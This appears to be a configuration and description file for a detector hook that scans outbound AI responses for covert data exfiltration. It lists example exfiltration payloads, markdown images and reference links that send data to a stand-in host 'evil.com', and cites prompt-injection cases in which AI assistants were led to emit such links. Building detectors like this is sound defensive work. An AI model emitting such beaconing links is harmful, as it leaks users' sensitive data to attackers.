---
name: exfiltration-detector
description: "Detects covert data exfiltration attempts in AI responses"
metadata: { "openclaw": { "emoji": "🚫", "events": ["message:sent"] } }
---
# Exfiltration Detector

Monitors AI responses for covert data exfiltration patterns — specially crafted markdown links and images that silently beacon sensitive data to attacker-controlled servers.

## Detected Patterns

- **Markdown image with query params** — `![img](https://evil.com?data=secret)` style pixel tracking
- **Suspicious markdown links** — links with unusually long query strings (50+ chars) to unknown domains
- **Reference-style exfil** — `[ref]: https://evil.com?steal=data` hidden link definitions
- **Data URI injection** — `![](data:text/html,...)` for local data exfiltration
- **Base64 in URL paths** — long base64-encoded segments in URL paths used to carry stolen data

## Events

| Event | Action |
|-------|--------|
| `message:sent` | Scans outbound AI response before delivery to user |

## CVE References

- **CVE-2025-32711** (EchoLeak) — Prompt injection via markdown image links for data exfiltration
- **CVE-2025-53773** — GitHub Copilot data exfiltration via crafted markdown

## References

- OWASP LLM Top 10 2025: LLM02 (Sensitive Information Disclosure)
- MITRE ATLAS: AML.T0009 (Obtain Capabilities)
